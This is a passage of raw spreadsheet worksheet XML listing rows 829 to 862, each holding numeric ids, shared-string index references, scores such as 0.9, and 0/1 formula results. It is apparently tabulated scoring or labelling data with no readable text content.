    </row>
    <row r="829">
      <c r="A829" s="62">
        <v>21367.0</v>
      </c>
      <c r="B829" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C829" s="63" t="s">
        <v>2689</v>
      </c>
      <c r="D829" s="62" t="s">
        <v>2690</v>
      </c>
      <c r="E829" s="62" t="s">
        <v>2691</v>
      </c>
      <c r="F829" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G829" s="62">
        <v>0.7</v>
      </c>
      <c r="H829" s="64">
        <v>0.0</v>
      </c>
      <c r="I829" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J829" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K829" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L829" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O829" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="62">
        <v>21450.0</v>
      </c>
      <c r="B830" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C830" s="63" t="s">
        <v>2692</v>
      </c>
      <c r="D830" s="62" t="s">
        <v>2693</v>
      </c>
      <c r="E830" s="62" t="s">
        <v>2694</v>
      </c>
      <c r="F830" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G830" s="62">
        <v>0.95</v>
      </c>
      <c r="H830" s="64">
        <v>1.0</v>
      </c>
      <c r="I830" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J830" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K830" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L830" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O830" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="62">
        <v>21534.0</v>
      </c>
      <c r="B831" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C831" s="63" t="s">
        <v>2695</v>
      </c>
      <c r="D831" s="62" t="s">
        <v>2696</v>
      </c>
      <c r="E831" s="62" t="s">
        <v>2697</v>
      </c>
      <c r="F831" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G831" s="62">
        <v>0.9</v>
      </c>
      <c r="H831" s="64">
        <v>1.0</v>
      </c>
      <c r="I831" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J831" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K831" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L831" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O831" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="62">
        <v>23201.0</v>
      </c>
      <c r="B832" s="62" t="s">
        <v>102</v>
      </c>
      <c r="C832" s="63" t="s">
        <v>2698</v>
      </c>
      <c r="D832" s="62" t="s">
        <v>2699</v>
      </c>
      <c r="E832" s="62" t="s">
        <v>2700</v>
      </c>
      <c r="F832" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G832" s="62">
        <v>0.9</v>
      </c>
      <c r="H832" s="64">
        <v>0.0</v>
      </c>
      <c r="I832" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J832" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K832" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L832" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M832" s="62" t="s">
        <v>2701</v>
      </c>
      <c r="N832" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O832" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="62">
        <v>26882.0</v>
      </c>
      <c r="B833" s="62" t="s">
        <v>104</v>
      </c>
      <c r="C833" s="63" t="s">
        <v>2702</v>
      </c>
      <c r="D833" s="62" t="s">
        <v>2703</v>
      </c>
      <c r="E833" s="62" t="s">
        <v>2704</v>
      </c>
      <c r="F833" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G833" s="62">
        <v>0.9</v>
      </c>
      <c r="H833" s="64">
        <v>1.0</v>
      </c>
      <c r="I833" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J833" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K833" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L833" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O833" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="62">
        <v>11313.0</v>
      </c>
      <c r="B834" s="62" t="s">
        <v>106</v>
      </c>
      <c r="C834" s="63" t="s">
        <v>2705</v>
      </c>
      <c r="D834" s="62" t="s">
        <v>2706</v>
      </c>
      <c r="E834" s="62" t="s">
        <v>2707</v>
      </c>
      <c r="F834" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G834" s="62">
        <v>0.9</v>
      </c>
      <c r="H834" s="64">
        <v>1.0</v>
      </c>
      <c r="I834" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J834" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K834" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L834" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M834" s="62" t="s">
        <v>2708</v>
      </c>
      <c r="N834" s="62" t="s">
        <v>2709</v>
      </c>
      <c r="O834" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="62">
        <v>491.0</v>
      </c>
      <c r="B835" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C835" s="63" t="s">
        <v>2710</v>
      </c>
      <c r="D835" s="62" t="s">
        <v>2711</v>
      </c>
      <c r="E835" s="62" t="s">
        <v>2712</v>
      </c>
      <c r="F835" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G835" s="62">
        <v>0.85</v>
      </c>
      <c r="H835" s="64">
        <v>0.0</v>
      </c>
      <c r="I835" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J835" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K835" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L835" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O835" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="62">
        <v>833.0</v>
      </c>
      <c r="B836" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C836" s="63" t="s">
        <v>2713</v>
      </c>
      <c r="D836" s="62" t="s">
        <v>2714</v>
      </c>
      <c r="E836" s="62" t="s">
        <v>2715</v>
      </c>
      <c r="F836" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G836" s="62">
        <v>0.95</v>
      </c>
      <c r="H836" s="64">
        <v>1.0</v>
      </c>
      <c r="I836" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J836" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K836" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L836" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O836" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="62">
        <v>1422.0</v>
      </c>
      <c r="B837" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C837" s="63" t="s">
        <v>2716</v>
      </c>
      <c r="D837" s="62" t="s">
        <v>2717</v>
      </c>
      <c r="E837" s="62" t="s">
        <v>2718</v>
      </c>
      <c r="F837" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G837" s="62">
        <v>0.85</v>
      </c>
      <c r="H837" s="64">
        <v>1.0</v>
      </c>
      <c r="I837" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J837" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K837" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L837" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O837" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="62">
        <v>1802.0</v>
      </c>
      <c r="B838" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C838" s="63" t="s">
        <v>2719</v>
      </c>
      <c r="D838" s="62" t="s">
        <v>2720</v>
      </c>
      <c r="E838" s="62" t="s">
        <v>2721</v>
      </c>
      <c r="F838" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G838" s="62">
        <v>0.9</v>
      </c>
      <c r="H838" s="64">
        <v>1.0</v>
      </c>
      <c r="I838" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J838" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K838" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L838" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O838" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="62">
        <v>2447.0</v>
      </c>
      <c r="B839" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C839" s="63" t="s">
        <v>2722</v>
      </c>
      <c r="D839" s="62" t="s">
        <v>2723</v>
      </c>
      <c r="E839" s="62" t="s">
        <v>2724</v>
      </c>
      <c r="F839" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G839" s="62">
        <v>0.9</v>
      </c>
      <c r="H839" s="64">
        <v>0.0</v>
      </c>
      <c r="I839" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J839" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K839" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L839" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O839" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="62">
        <v>2468.0</v>
      </c>
      <c r="B840" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C840" s="63" t="s">
        <v>2725</v>
      </c>
      <c r="D840" s="62" t="s">
        <v>2726</v>
      </c>
      <c r="E840" s="62" t="s">
        <v>2727</v>
      </c>
      <c r="F840" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G840" s="62">
        <v>0.9</v>
      </c>
      <c r="H840" s="64">
        <v>0.0</v>
      </c>
      <c r="I840" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J840" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K840" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L840" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O840" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="62">
        <v>2727.0</v>
      </c>
      <c r="B841" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C841" s="63" t="s">
        <v>2728</v>
      </c>
      <c r="D841" s="62" t="s">
        <v>2729</v>
      </c>
      <c r="E841" s="62" t="s">
        <v>2730</v>
      </c>
      <c r="F841" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G841" s="62">
        <v>0.9</v>
      </c>
      <c r="H841" s="64">
        <v>0.0</v>
      </c>
      <c r="I841" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J841" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K841" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L841" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O841" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="62">
        <v>3520.0</v>
      </c>
      <c r="B842" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C842" s="63" t="s">
        <v>2731</v>
      </c>
      <c r="D842" s="62" t="s">
        <v>2732</v>
      </c>
      <c r="E842" s="62" t="s">
        <v>2733</v>
      </c>
      <c r="F842" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G842" s="62">
        <v>0.95</v>
      </c>
      <c r="H842" s="64">
        <v>1.0</v>
      </c>
      <c r="I842" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J842" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K842" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L842" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O842" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="62">
        <v>3712.0</v>
      </c>
      <c r="B843" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C843" s="63" t="s">
        <v>2734</v>
      </c>
      <c r="D843" s="62" t="s">
        <v>2735</v>
      </c>
      <c r="E843" s="62" t="s">
        <v>2736</v>
      </c>
      <c r="F843" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G843" s="62">
        <v>0.85</v>
      </c>
      <c r="H843" s="64">
        <v>0.0</v>
      </c>
      <c r="I843" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J843" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K843" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L843" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O843" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="62">
        <v>5564.0</v>
      </c>
      <c r="B844" s="62" t="s">
        <v>108</v>
      </c>
      <c r="C844" s="63" t="s">
        <v>2737</v>
      </c>
      <c r="D844" s="62" t="s">
        <v>2738</v>
      </c>
      <c r="E844" s="62" t="s">
        <v>2739</v>
      </c>
      <c r="F844" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G844" s="62">
        <v>0.9</v>
      </c>
      <c r="H844" s="64">
        <v>0.0</v>
      </c>
      <c r="I844" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J844" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K844" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L844" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O844" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="62">
        <v>13.0</v>
      </c>
      <c r="B845" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C845" s="63" t="s">
        <v>2740</v>
      </c>
      <c r="D845" s="62" t="s">
        <v>2741</v>
      </c>
      <c r="E845" s="62" t="s">
        <v>2742</v>
      </c>
      <c r="F845" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G845" s="62">
        <v>0.9</v>
      </c>
      <c r="H845" s="64">
        <v>0.0</v>
      </c>
      <c r="I845" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J845" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K845" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L845" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O845" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="62">
        <v>110.0</v>
      </c>
      <c r="B846" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C846" s="63" t="s">
        <v>2743</v>
      </c>
      <c r="D846" s="62" t="s">
        <v>2744</v>
      </c>
      <c r="E846" s="62" t="s">
        <v>2745</v>
      </c>
      <c r="F846" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G846" s="62">
        <v>0.9</v>
      </c>
      <c r="H846" s="64">
        <v>0.0</v>
      </c>
      <c r="I846" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J846" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K846" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L846" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O846" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="62">
        <v>552.0</v>
      </c>
      <c r="B847" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C847" s="63" t="s">
        <v>2746</v>
      </c>
      <c r="D847" s="62" t="s">
        <v>2747</v>
      </c>
      <c r="E847" s="62" t="s">
        <v>2748</v>
      </c>
      <c r="F847" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G847" s="62">
        <v>0.85</v>
      </c>
      <c r="H847" s="64">
        <v>0.0</v>
      </c>
      <c r="I847" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J847" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K847" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L847" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O847" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="62">
        <v>591.0</v>
      </c>
      <c r="B848" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C848" s="63" t="s">
        <v>2749</v>
      </c>
      <c r="D848" s="62" t="s">
        <v>2750</v>
      </c>
      <c r="E848" s="62" t="s">
        <v>2751</v>
      </c>
      <c r="F848" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G848" s="62">
        <v>0.85</v>
      </c>
      <c r="H848" s="64">
        <v>0.0</v>
      </c>
      <c r="I848" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J848" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K848" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L848" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O848" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="62">
        <v>631.0</v>
      </c>
      <c r="B849" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C849" s="63" t="s">
        <v>2752</v>
      </c>
      <c r="D849" s="62" t="s">
        <v>2753</v>
      </c>
      <c r="E849" s="62" t="s">
        <v>2754</v>
      </c>
      <c r="F849" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G849" s="62">
        <v>0.85</v>
      </c>
      <c r="H849" s="64">
        <v>0.0</v>
      </c>
      <c r="I849" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J849" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K849" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L849" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O849" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="62">
        <v>673.0</v>
      </c>
      <c r="B850" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C850" s="67" t="s">
        <v>2755</v>
      </c>
      <c r="D850" s="62" t="s">
        <v>2756</v>
      </c>
      <c r="E850" s="62" t="s">
        <v>2757</v>
      </c>
      <c r="F850" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G850" s="62">
        <v>0.9</v>
      </c>
      <c r="H850" s="64">
        <v>0.0</v>
      </c>
      <c r="I850" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J850" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K850" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L850" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O850" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="62">
        <v>738.0</v>
      </c>
      <c r="B851" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C851" s="63" t="s">
        <v>2758</v>
      </c>
      <c r="D851" s="62" t="s">
        <v>2759</v>
      </c>
      <c r="E851" s="62" t="s">
        <v>2760</v>
      </c>
      <c r="F851" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G851" s="62">
        <v>0.9</v>
      </c>
      <c r="H851" s="64">
        <v>0.0</v>
      </c>
      <c r="I851" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J851" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K851" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L851" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O851" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="62">
        <v>801.0</v>
      </c>
      <c r="B852" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C852" s="63" t="s">
        <v>2761</v>
      </c>
      <c r="D852" s="62" t="s">
        <v>2762</v>
      </c>
      <c r="E852" s="62" t="s">
        <v>2763</v>
      </c>
      <c r="F852" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G852" s="62">
        <v>0.85</v>
      </c>
      <c r="H852" s="64">
        <v>0.0</v>
      </c>
      <c r="I852" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J852" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K852" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L852" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O852" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="62">
        <v>922.0</v>
      </c>
      <c r="B853" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C853" s="63" t="s">
        <v>2764</v>
      </c>
      <c r="D853" s="62" t="s">
        <v>2765</v>
      </c>
      <c r="E853" s="62" t="s">
        <v>2766</v>
      </c>
      <c r="F853" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G853" s="62">
        <v>0.85</v>
      </c>
      <c r="H853" s="64">
        <v>0.0</v>
      </c>
      <c r="I853" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J853" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K853" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L853" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O853" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="62">
        <v>1337.0</v>
      </c>
      <c r="B854" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C854" s="63" t="s">
        <v>2767</v>
      </c>
      <c r="D854" s="62" t="s">
        <v>2768</v>
      </c>
      <c r="E854" s="62" t="s">
        <v>2769</v>
      </c>
      <c r="F854" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G854" s="62">
        <v>0.85</v>
      </c>
      <c r="H854" s="64">
        <v>0.0</v>
      </c>
      <c r="I854" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J854" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K854" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L854" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O854" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="62">
        <v>1350.0</v>
      </c>
      <c r="B855" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C855" s="63" t="s">
        <v>2770</v>
      </c>
      <c r="D855" s="62" t="s">
        <v>2771</v>
      </c>
      <c r="E855" s="62" t="s">
        <v>2772</v>
      </c>
      <c r="F855" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G855" s="62">
        <v>0.8</v>
      </c>
      <c r="H855" s="64">
        <v>1.0</v>
      </c>
      <c r="I855" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J855" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K855" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L855" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O855" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="62">
        <v>2092.0</v>
      </c>
      <c r="B856" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C856" s="63" t="s">
        <v>2773</v>
      </c>
      <c r="D856" s="62" t="s">
        <v>2774</v>
      </c>
      <c r="E856" s="62" t="s">
        <v>2775</v>
      </c>
      <c r="F856" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G856" s="62">
        <v>0.9</v>
      </c>
      <c r="H856" s="64">
        <v>1.0</v>
      </c>
      <c r="I856" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J856" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K856" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L856" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O856" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="62">
        <v>2148.0</v>
      </c>
      <c r="B857" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C857" s="63" t="s">
        <v>2776</v>
      </c>
      <c r="D857" s="62" t="s">
        <v>2777</v>
      </c>
      <c r="E857" s="62" t="s">
        <v>2778</v>
      </c>
      <c r="F857" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G857" s="62">
        <v>0.95</v>
      </c>
      <c r="H857" s="64">
        <v>1.0</v>
      </c>
      <c r="I857" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J857" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K857" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L857" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O857" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="62">
        <v>2162.0</v>
      </c>
      <c r="B858" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C858" s="63" t="s">
        <v>2779</v>
      </c>
      <c r="D858" s="62" t="s">
        <v>2780</v>
      </c>
      <c r="E858" s="62" t="s">
        <v>2781</v>
      </c>
      <c r="F858" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G858" s="62">
        <v>0.85</v>
      </c>
      <c r="H858" s="64">
        <v>0.0</v>
      </c>
      <c r="I858" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J858" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K858" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L858" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O858" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="62">
        <v>2375.0</v>
      </c>
      <c r="B859" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C859" s="63" t="s">
        <v>2782</v>
      </c>
      <c r="D859" s="62" t="s">
        <v>2783</v>
      </c>
      <c r="E859" s="62" t="s">
        <v>2784</v>
      </c>
      <c r="F859" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G859" s="62">
        <v>0.9</v>
      </c>
      <c r="H859" s="64">
        <v>1.0</v>
      </c>
      <c r="I859" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J859" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K859" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L859" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O859" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="62">
        <v>2606.0</v>
      </c>
      <c r="B860" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C860" s="63" t="s">
        <v>2785</v>
      </c>
      <c r="D860" s="62" t="s">
        <v>2786</v>
      </c>
      <c r="E860" s="62" t="s">
        <v>2787</v>
      </c>
      <c r="F860" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G860" s="62">
        <v>0.9</v>
      </c>
      <c r="H860" s="64">
        <v>1.0</v>
      </c>
      <c r="I860" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J860" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K860" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L860" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O860" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="62">
        <v>2759.0</v>
      </c>
      <c r="B861" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C861" s="63" t="s">
        <v>2788</v>
      </c>
      <c r="D861" s="62" t="s">
        <v>2789</v>
      </c>
      <c r="E861" s="62" t="s">
        <v>2790</v>
      </c>
      <c r="F861" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G861" s="62">
        <v>0.9</v>
      </c>
      <c r="H861" s="64">
        <v>0.0</v>
      </c>
      <c r="I861" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J861" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K861" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L861" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O861" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="62">
        <v>2760.0</v>
      </c>
      <c r="B862" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C862" s="63" t="s">
        <v>2791</v>
      </c>
      <c r="D862" s="62" t="s">
        <v>2792</v>
      </c>
      <c r="E862" s="62" t="s">
        <v>2793</v>
      </c>
      <c r="F862" s="62" t="s">
        <v>134</v>
